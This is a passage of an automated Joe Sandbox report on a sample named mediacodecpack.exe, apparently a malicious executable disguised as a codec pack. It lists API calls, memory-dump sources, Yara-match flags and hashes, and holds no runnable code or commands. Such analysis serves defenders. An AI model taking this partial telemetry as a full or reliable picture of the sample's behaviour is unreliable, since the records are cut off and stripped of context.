                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Send
                                                                                • String ID:
                                                                                • API String ID: 1282938840-0
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D0740B
                                                                                • shutdown.WS2_32(?,00000002), ref: 02D07414
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastshutdown
                                                                                • String ID:
                                                                                • API String ID: 1920494066-0
                                                                                APIs
                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                  • Part of subcall function 00403A1C: GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                • HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                  • Part of subcall function 00403F3B: HeapAlloc.KERNEL32(00000000,00000140,00403B9D,000003F8), ref: 00403F48
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocCreateDestroyVersion
                                                                                • String ID:
                                                                                • API String ID: 2507506473-0
                                                                                APIs
                                                                                • lstrcmpiW.KERNELBASE(?), ref: 0040230F
                                                                                • lstrcmpiW.KERNEL32(?,00409174), ref: 0040D7CD
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, xrefs: 0040D655
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                • API String ID: 1586166983-3897538755
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0511E
                                                                                  • Part of subcall function 02D03D7E: htons.WS2_32(?), ref: 02D03DA2
                                                                                  • Part of subcall function 02D03D7E: htonl.WS2_32(00000000), ref: 02D03DB9
                                                                                  • Part of subcall function 02D03D7E: htonl.WS2_32(00000000), ref: 02D03DC0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonl$H_prologhtons
                                                                                • String ID:
                                                                                • API String ID: 4039807196-0
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0D9CA
                                                                                  • Part of subcall function 02D01A01: TlsGetValue.KERNEL32 ref: 02D01A0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologValue
                                                                                • String ID:
                                                                                • API String ID: 3700342317-0
                                                                                • Opcode ID: 304d9df10f10aca8c479f4303070fb2784896f8dac8e5ae19ee683e2e0c88a62
                                                                                • Instruction ID: 4ed2039b7039b67aeab60d16032b538ed7a9a743937e32ce325bc6c49cb595bc
                                                                                • Opcode Fuzzy Hash: 304d9df10f10aca8c479f4303070fb2784896f8dac8e5ae19ee683e2e0c88a62
                                                                                • Instruction Fuzzy Hash: 2C211DB1908209AFDB04DFA9D481BFEBBF9EF58314F10415AE914A7390D775AD01CBA1
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0D55A
                                                                                  • Part of subcall function 02D026DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D02706
                                                                                  • Part of subcall function 02D026DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D0272B
                                                                                  • Part of subcall function 02D026DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D23173), ref: 02D02738
                                                                                  • Part of subcall function 02D026DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D02778
                                                                                  • Part of subcall function 02D026DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D027D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                • String ID:
                                                                                • API String ID: 4293676635-0
                                                                                • Opcode ID: 32b16d3cf6c69f3df2b32c0321c325907244e528a7a75c62c414530ff2a37daf
                                                                                • Instruction ID: 25faddd0de406012f34e3a0f1b330f9719974a1c063c90eaaf4c8c2c58abde19
                                                                                • Opcode Fuzzy Hash: 32b16d3cf6c69f3df2b32c0321c325907244e528a7a75c62c414530ff2a37daf
                                                                                • Instruction Fuzzy Hash: 6701D0B0900B188FC328CF0AC144A46FBF4EF98318B05C5AF98498B722E7B1DA44CF94
                                                                                APIs
                                                                                • RegCreateKeyExA.KERNELBASE ref: 00402067
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 3540db52f434ddc9a5e88a25ebbe78732f397ff3a0348fb306cb0839e4e44521
                                                                                • Instruction ID: dc96bbfccdb8053c3a700f92ee76c71f5d4f4b682c0e303dba9fd296f600d57d
                                                                                • Opcode Fuzzy Hash: 3540db52f434ddc9a5e88a25ebbe78732f397ff3a0348fb306cb0839e4e44521
                                                                                • Instruction Fuzzy Hash: 6AF03A9452C1C58AC7528B746FA05E13FB0952730475810BAD1C5BB2A3D13C4C4BFB2E
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 4e38cb075687cdea619f3bf54c840e3562a9fef943118b1a9c8c65c73502d392
                                                                                • Instruction ID: d9ce72db35be277be2e25491e2fe96756ac457275e591dcd62e6f552b6e7838d
                                                                                • Opcode Fuzzy Hash: 4e38cb075687cdea619f3bf54c840e3562a9fef943118b1a9c8c65c73502d392
                                                                                • Instruction Fuzzy Hash: EFE04F545281C58FC7518B74AFA09E13FB082263507951065D1C5AF223C53C0C0AF71E
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0D339
                                                                                  • Part of subcall function 02D127C5: _malloc.LIBCMT ref: 02D127DD
                                                                                  • Part of subcall function 02D0D555: __EH_prolog.LIBCMT ref: 02D0D55A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$_malloc
                                                                                • String ID:
                                                                                • API String ID: 4254904621-0
                                                                                • Opcode ID: 85d18d68f780aeae025d7b65d01008e7f1298860faa9cf20fd219e886ab90080
                                                                                • Instruction ID: 49f2155d213221e2ece56dc1fc06edf90d5234ddcf4789d3091705cba6b411fc
                                                                                • Opcode Fuzzy Hash: 85d18d68f780aeae025d7b65d01008e7f1298860faa9cf20fd219e886ab90080
                                                                                • Instruction Fuzzy Hash: 99E08671A041056BDB19EFA8E81572D7772DB44704F00456E7C09A2740EB319D10CA20
                                                                                APIs
                                                                                  • Part of subcall function 02D148CA: __getptd_noexit.LIBCMT ref: 02D148CB
                                                                                  • Part of subcall function 02D148CA: __amsg_exit.LIBCMT ref: 02D148D8
                                                                                  • Part of subcall function 02D124A3: __getptd_noexit.LIBCMT ref: 02D124A7
                                                                                  • Part of subcall function 02D124A3: __freeptd.LIBCMT ref: 02D124C1
                                                                                  • Part of subcall function 02D124A3: RtlExitUserThread.NTDLL(?,00000000,?,02D12483,00000000), ref: 02D124CA
                                                                                • __XcptFilter.LIBCMT ref: 02D1248F
                                                                                  • Part of subcall function 02D17954: __getptd_noexit.LIBCMT ref: 02D17958
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                • String ID:
                                                                                • API String ID: 1405322794-0
                                                                                • Opcode ID: bb7151c670bcdca12470227b0be95adc145e7aea6f19e0c84718119e4804f643
                                                                                • Instruction ID: 106830e8c1031586c8749758bd2bd720d677c08361de04f87e59cf78f4d19010
                                                                                • Opcode Fuzzy Hash: bb7151c670bcdca12470227b0be95adc145e7aea6f19e0c84718119e4804f643
                                                                                • Instruction Fuzzy Hash: 9BE0ECB1D00614AFFB09ABA0E949F6DB776EF44315F200189E1029B770DB759D44DE30
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: 7f651b374f54228f6bc9faab538ab4ca973f2f1747f5f25936a3bb265510c994
                                                                                • Instruction ID: d713a23b53c9c0110701be63413fe7ba467f275e167bf38fafe440168cb698c8
                                                                                • Opcode Fuzzy Hash: 7f651b374f54228f6bc9faab538ab4ca973f2f1747f5f25936a3bb265510c994
                                                                                • Instruction Fuzzy Hash: CBC01230A0C105D9D7408AB09A482F933A06B10344F2049379003B31E0D7BC96477A1F
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 3489ab96d9054207fc6ee079703d11ddffc9cb2ea16ff9c83c84c4d6f2bb7d51
                                                                                • Instruction ID: 3ae1305fe96f7b026bdce6d5508892710976a9331c56da0873e7a2e16a087c10
                                                                                • Opcode Fuzzy Hash: 3489ab96d9054207fc6ee079703d11ddffc9cb2ea16ff9c83c84c4d6f2bb7d51
                                                                                • Instruction Fuzzy Hash: 59C08C00058140D2D6621B80830C228BA60EC0132837105BB89C2B08E2C93E4002639F
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: CopyFile
                                                                                • String ID:
                                                                                • API String ID: 1304948518-0
                                                                                • Opcode ID: 245ca553eba262ceeda6859a0c1b7052dd866a1ae5a1f2892251fe5e5d36827f
                                                                                • Instruction ID: 7bbc41cb3671d7189b02c36164488bf25c771ca428d4fc6e3714b0364fd68ab0
                                                                                • Opcode Fuzzy Hash: 245ca553eba262ceeda6859a0c1b7052dd866a1ae5a1f2892251fe5e5d36827f
                                                                                • Instruction Fuzzy Hash: 85B09270904009ABC6148A508E44AB726B89704B41F5604BB944BF10D0DB3D8A4EE92A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: 9f1a88ab5ad4be0ebb8157ffabc4757f0ab93b81c4f2aaf2bdbc407fbf08c152
                                                                                • Instruction ID: 18e5a28a3b3dd855b8cfa4906261ab54779018c6ab8ca9ff62ca61d76da0e4fd
                                                                                • Opcode Fuzzy Hash: 9f1a88ab5ad4be0ebb8157ffabc4757f0ab93b81c4f2aaf2bdbc407fbf08c152
                                                                                • Instruction Fuzzy Hash: 02A002215546019AD1483771AB4EB3839106701705F15417B7396750E34DB80186591F
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D955
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: ManagerOpen
                                                                                • String ID:
                                                                                • API String ID: 1889721586-0
                                                                                • Opcode ID: 588bc922b1ae59d6981b7f71b816890ba09d726b2026b1c215153f9f61e131fc
                                                                                • Instruction ID: 2654581188708fff4f1950a7e9f7eb320ae01a33822ca65d1bb5e0d43ee44f7c
                                                                                • Opcode Fuzzy Hash: 588bc922b1ae59d6981b7f71b816890ba09d726b2026b1c215153f9f61e131fc
                                                                                • Instruction Fuzzy Hash: 24A022200000008ACBA02F880A8800C3000803A2003220838C00AF00A0EA30808CB20E
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D38000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D38000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d38000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: d40964c7e3747278ea1569aff02c7ca133167a2a71c7c53ac2b567ec83d16ced
                                                                                • Instruction ID: c5c2b5d2f459e6cef4cefc4611ed52f6c1d98f12deb216d5be48caa454f9f741
                                                                                • Opcode Fuzzy Hash: d40964c7e3747278ea1569aff02c7ca133167a2a71c7c53ac2b567ec83d16ced
                                                                                • Instruction Fuzzy Hash: 67519EF2608600AFE7096E19DC9577EF7E9EF98724F16092EE6C583340EA3558408A97
                                                                                APIs
                                                                                  • Part of subcall function 02D10620: OpenEventA.KERNEL32(00100002,00000000,00000000,5304F1C2), ref: 02D106C0
                                                                                  • Part of subcall function 02D10620: CloseHandle.KERNEL32(00000000), ref: 02D106D5
                                                                                  • Part of subcall function 02D10620: ResetEvent.KERNEL32(00000000,5304F1C2), ref: 02D106DF
                                                                                  • Part of subcall function 02D10620: CloseHandle.KERNEL32(00000000,5304F1C2), ref: 02D10714
                                                                                • TlsSetValue.KERNEL32(0000002B,?), ref: 02D111BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventHandle$OpenResetValue
                                                                                • String ID:
                                                                                • API String ID: 1556185888-0
                                                                                • Opcode ID: 76368609e87f110b4ab23b8e9a77792ff561a2b8ac1222fdd2bb3b60de6bec9a
                                                                                • Instruction ID: a134a51cbe72b17822560a94e70f949fa58d486f357d4dce6979ee36cd431d5e
                                                                                • Opcode Fuzzy Hash: 76368609e87f110b4ab23b8e9a77792ff561a2b8ac1222fdd2bb3b60de6bec9a
                                                                                • Instruction Fuzzy Hash: F3018F71A44254BBD710DF58ED05B5ABBA8EB05761F10462AF829D3780D735AD048AA0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 96e27dbb9823b1666f7584e96563389482625cae06c6d81eb07ea20c82007e69
                                                                                • Instruction ID: 763a04054358afd8034bdf58efe23934774701223f643223d2c193f16d8f67d7
                                                                                • Opcode Fuzzy Hash: 96e27dbb9823b1666f7584e96563389482625cae06c6d81eb07ea20c82007e69
                                                                                • Instruction Fuzzy Hash: 07D0C930C14028EFCB155B91E948CADFF71FB0C301B110067F481B65A1D33D4416BB15
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 0040D4FF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: e70ff7383fdc550b8611bea6a0e07a4ef8de3c4a04e7383cfabd8b0d4d976bca
                                                                                • Instruction ID: abf7d64f5ecc0974fd71cc89ec6167098742f4484bef6f8b47254da587dc98f1
                                                                                • Opcode Fuzzy Hash: e70ff7383fdc550b8611bea6a0e07a4ef8de3c4a04e7383cfabd8b0d4d976bca
                                                                                • Instruction Fuzzy Hash: D3A0027298D640C7D18C2B906B0972535746F40701F36A03B9397744F19ABC364E7A5F
                                                                                APIs
                                                                                • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                                  • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                • sqlite3_step.SQLITE3 ref: 6096755A
                                                                                • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                                • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                                • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                                • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                                • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                                • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                                • sqlite3_step.SQLITE3 ref: 609679C3
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                                • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                                • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                                • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                                • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                                • sqlite3_step.SQLITE3 ref: 60967B94
                                                                                • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                                • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                                • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                                • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                                • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                                  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                                • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                                • memcmp.MSVCRT ref: 60967D4C
                                                                                • sqlite3_free.SQLITE3 ref: 60967D69
                                                                                • sqlite3_free.SQLITE3 ref: 60967D74
                                                                                • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                                • sqlite3_free.SQLITE3 ref: 60968002
                                                                                  • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                  • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                  • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                  • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                  • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                                • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                                  • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                  • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                                • sqlite3_reset.SQLITE3 ref: 60968035
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                                  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                                • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                                • sqlite3_step.SQLITE3 ref: 609680D1
                                                                                • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                                • sqlite3_reset.SQLITE3 ref: 60968104
                                                                                • sqlite3_step.SQLITE3 ref: 60968139
                                                                                • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                                • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                                  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                                  • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                                • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                                  • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                                • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                                  • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                                • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                                  • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                                • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                                • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                                • sqlite3_step.SQLITE3 ref: 6096764C
                                                                                • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                                • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                                • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                                  • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                                • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                                • sqlite3_step.SQLITE3 ref: 609690E6
                                                                                • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                                • sqlite3_free.SQLITE3 ref: 60969102
                                                                                • sqlite3_free.SQLITE3 ref: 6096910D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                                • String ID: $d
                                                                                • API String ID: 2451604321-2084297493
                                                                                • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                                • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                                APIs
                                                                                • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                                • sqlite3_free.SQLITE3 ref: 60966183
                                                                                • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                                • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                                • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                                • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                                • memcmp.MSVCRT ref: 6096639E
                                                                                  • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                  • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                                • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                                • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                  • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                  • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
